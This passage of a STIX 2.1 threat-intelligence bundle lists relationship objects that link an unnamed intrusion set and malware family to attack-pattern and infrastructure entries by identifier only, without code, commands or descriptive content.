"relationship", "spec_version": "2.1", "id": "relationship--d5bd8cae-4279-5001-a30d-f78ca77ee9fe", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926365Z", "modified": "2026-06-16T16:01:05.926365Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4d9ac0e7-78b1-539f-875f-83b9fece5d24", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92646Z", "modified": "2026-06-16T16:01:05.92646Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0012cf33-115e-5af0-9aa6-caea481e9ec0", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926555Z", "modified": "2026-06-16T16:01:05.926555Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--57a0fc67-1714-5cc9-bd1d-f45d9444d085", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926651Z", "modified": "2026-06-16T16:01:05.926651Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0e83f645-fe7f-5903-b320-ebc3b1f9781d", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926745Z", "modified": "2026-06-16T16:01:05.926745Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--5dbc59ca-c7aa-580d-938e-b3f8edb040fe", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926841Z", "modified": "2026-06-16T16:01:05.926841Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--95cb60cd-c2a7-5611-9625-4d1d49dfb100", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.926939Z", "modified": "2026-06-16T16:01:05.926939Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--08fd3bc9-40d1-5b02-9497-9a4d0a2170cb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927036Z", "modified": "2026-06-16T16:01:05.927036Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7fdfefde-fc2e-52ce-91f0-1819fc568d6a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927142Z", "modified": "2026-06-16T16:01:05.927142Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--c7e2002d-5988-5176-b542-ab934942ab76", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927263Z", "modified": "2026-06-16T16:01:05.927263Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2d6b4aeb-3aa8-5b7d-a6c5-33b6baa8ce47", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927358Z", "modified": "2026-06-16T16:01:05.927358Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--007b455a-814a-51a0-b372-27983b26133b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927453Z", "modified": "2026-06-16T16:01:05.927453Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6909bd83-a6bd-5972-8f75-882ac444f4c9", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92755Z", "modified": "2026-06-16T16:01:05.92755Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--d6b8aa8c-cfd9-5f42-a8ac-2573005abb2f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--b37978ac-adb6-5de2-9473-5bccb0517d94", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927645Z", "modified": "2026-06-16T16:01:05.927645Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--e42939d6-6332-5a6c-8dac-6195c79081bc", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0c5c0fa6-c959-545d-a28a-9d5c70fec19e", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92774Z", "modified": "2026-06-16T16:01:05.92774Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--b1f2e4be-8bd7-50f4-9b12-8ff5a814d239", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cf5684db-054f-5a1d-bda8-98d1a9f73ebb", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.927835Z", "modified": "2026-06-16T16:01:05.927835Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--030bfe25-492a-5e3f-aad5-1c799345aa06", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--8140f544-d950-57e9-8d1a-f537c69429e5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92793Z", "modified": "2026-06-16T16:01:05.92793Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--88e2313f-cf2a-59dc-8124-88e46e53b1c4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f1cd9cd1-22a1-58e7-80c2-5e81fdeff361", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928026Z", "modified": "2026-06-16T16:01:05.928026Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--8bd25a7b-1b65-5b61-9080-4b05d2ce7541", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--23bc6026-f270-57b2-b4f4-1b136aba097a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928126Z", "modified": "2026-06-16T16:01:05.928126Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--90b1ec40-76c9-58fb-a196-08fba40259d7", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928222Z", "modified": "2026-06-16T16:01:05.928222Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1a7b65aa-fd9a-5fbd-96a9-5f0419af1714", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928317Z", "modified": "2026-06-16T16:01:05.928317Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4ae346b5-1b18-5423-a5ee-022e2c52af48", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928412Z", "modified": "2026-06-16T16:01:05.928412Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7ff8ca42-e709-500c-843d-fe3d06646452", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928506Z", "modified": "2026-06-16T16:01:05.928506Z", "relationship_type": "uses", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--39678050-d607-5d96-b125-d99d0faeb780", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928602Z", "modified": "2026-06-16T16:01:05.928602Z", "relationship_type": "hosts", "source_ref": "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "target_ref": "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--143b277d-6150-5b95-a646-3e39ad6783a4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928699Z", "modified": "2026-06-16T16:01:05.928699Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--5b7a06ed-32c6-5260-95a8-8e82d3f41f1f", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6c7b6c21-ebe1-5f03-8bcc-6c0ca0cb6e25", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928794Z", "modified": "2026-06-16T16:01:05.928794Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--dc18c976-0434-597c-bbcd-79a7131f6aca", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--f2494bd1-8228-5af6-aed8-4154c053fad6", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928889Z", "modified": "2026-06-16T16:01:05.928889Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--05023500-1905-50d5-af07-f1896a464314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--402cfb3a-3dd9-5ac6-b77b-30749e130753", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.928982Z", "modified": "2026-06-16T16:01:05.928982Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--9800866f-1d8d-5f89-bfaa-67bcfdd6fdb6", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ad65eb84-b1bf-5530-ba57-8211ce49d13b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929081Z", "modified": "2026-06-16T16:01:05.929081Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--87b8e72a-5437-59a8-a6a9-16f846415a26", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--a9f2cea8-10e2-503f-8ca9-1428b508cea5", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929176Z", "modified": "2026-06-16T16:01:05.929176Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--6214841b-936d-5da2-b5c8-4bed4cf9aee0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--de123953-c674-5ea4-a76c-b74e671f61ab", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929271Z", "modified": "2026-06-16T16:01:05.929271Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--4efef37e-c256-5987-a1b8-60d9424c7250", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3d5c24b7-4331-54e3-977f-ddd6f8691b38", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929365Z", "modified": "2026-06-16T16:01:05.929365Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--770465f6-d1b8-5285-9c27-a5a9569aa97b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--200e26a1-b7d3-55b4-b10d-58f558e7a36a", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92946Z", "modified": "2026-06-16T16:01:05.92946Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--99faa775-7366-5b35-9527-17f7643bc506", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4e4a322e-a5ea-5621-b3fa-1d39538d413f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929555Z", "modified": "2026-06-16T16:01:05.929555Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--73364e03-8914-541e-a33c-877b656c37e4", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--db2b19a4-9ab6-5133-a381-db6305bd3722", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92965Z", "modified": "2026-06-16T16:01:05.92965Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--c1d497a1-fd18-5b75-9bd4-65dcf03ad8e2", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0f12eb83-566f-55fc-adb3-9d28555a2505", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929745Z", "modified": "2026-06-16T16:01:05.929745Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--a42fc6ae-4096-53e5-98d2-02c39a64d42c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--1f82e84d-1e91-50f1-ba42-520c585a87b2", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.92984Z", "modified": "2026-06-16T16:01:05.92984Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--d2f1c4d6-c47e-5a04-a3fd-c736a48f01f1", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--168a0c12-7687-5283-b516-786978ce55fc", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.929951Z", "modified": "2026-06-16T16:01:05.929951Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--ef3ac7d9-a40e-539b-9435-17e7305a5bb8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e2788336-77ef-5cb0-82fd-888c374cf46c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930068Z", "modified": "2026-06-16T16:01:05.930068Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--1635f86c-b5b5-5339-b31b-87ce05013408", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--ad9dc6b6-1dac-5480-9dbb-5bd8d2d69ee3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930195Z", "modified": "2026-06-16T16:01:05.930195Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--d09ec016-9d07-5880-bbaa-b9dc297f2995", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--4f475503-fda9-59ab-8df0-58025bfc0bdd", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930332Z", "modified": "2026-06-16T16:01:05.930332Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--bef03fde-2eb8-5ba7-96bc-f6fe262d857c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--edc4e3a6-4b08-5a59-a90f-860c9a276151", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930478Z", "modified": "2026-06-16T16:01:05.930478Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--0e5a3749-a144-57b8-a774-20335f3f0941", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--01693e52-996f-5648-8600-fc68ae08f38b", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930615Z", "modified": "2026-06-16T16:01:05.930615Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--115d7bc5-0c5a-58b6-9a22-417821aa315c", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--cf8671e9-c79a-5242-aacd-d19c1f80fbd4", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930763Z", "modified": "2026-06-16T16:01:05.930763Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--f38353ba-cfac-577c-ac86-5e3f0c5fb314", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--0580a1fd-c556-5d55-a9bd-399ba4d73c4f", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.930877Z", "modified": "2026-06-16T16:01:05.930877Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--3e0f1033-d731-5b8e-8f4c-27484d52e4f0", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7f893652-5a33-5619-85ee-e76a6e5663ee", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931009Z", "modified": "2026-06-16T16:01:05.931009Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--74662a48-2fba-53a9-8582-008044ccd9d9", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--134057d6-683a-5600-a472-699be4e48e3c", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931129Z", "modified": "2026-06-16T16:01:05.931129Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--ae605b9d-aec8-5001-87c6-c60e0a234712", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e784258c-7142-58b2-8eed-e7e8196c48af", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931285Z", "modified": "2026-06-16T16:01:05.931285Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--67cee5b2-7970-5505-949d-f0b9a6c1c4bf", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d5239e8a-018f-5d3e-84e8-838d5e81e1c3", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931411Z", "modified": "2026-06-16T16:01:05.931411Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--a0baf777-47e7-57bb-a5f8-ffa4f9a1dbe8", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e4948dd9-5b4d-5e7e-b151-5e126ed9ad22", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931532Z", "modified": "2026-06-16T16:01:05.931532Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--b12dc527-38bd-5e3a-a077-afa4290df40b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2a4a7ee4-db68-52fa-8bbe-be12c1941af1", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931643Z", "modified": "2026-06-16T16:01:05.931643Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--fc3ef2f7-136f-551c-b37b-ebe6208fb232", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--e53af022-1a36-558d-bbf6-d71804ee2358", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931747Z", "modified": "2026-06-16T16:01:05.931747Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--adcf66b3-4abb-593f-a779-d41175990400", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6f228e4c-823f-5782-9216-9afa16afbc29", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.93184Z", "modified": "2026-06-16T16:01:05.93184Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--e143cf40-c9b0-5118-8096-34d60698c27b", "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9132284e-61ad-5a22-8ec0-3b728e08ba27", "created_by_ref": "identity--8bc8284b-deb5-546c-a233-57ea34b2ea0d", "created": "2026-06-16T16:01:05.931935Z", "modified": "2026-06-16T16:01:05.931935Z", "relationship_type": "uses", "source_ref": "malware--778122a5-43f4-501c-af6f-bf1e14e6215a", "target_ref": "attack-pattern--1076c468-8982-548b-9292-726a22f83ecb", "object_marking_refs": [ 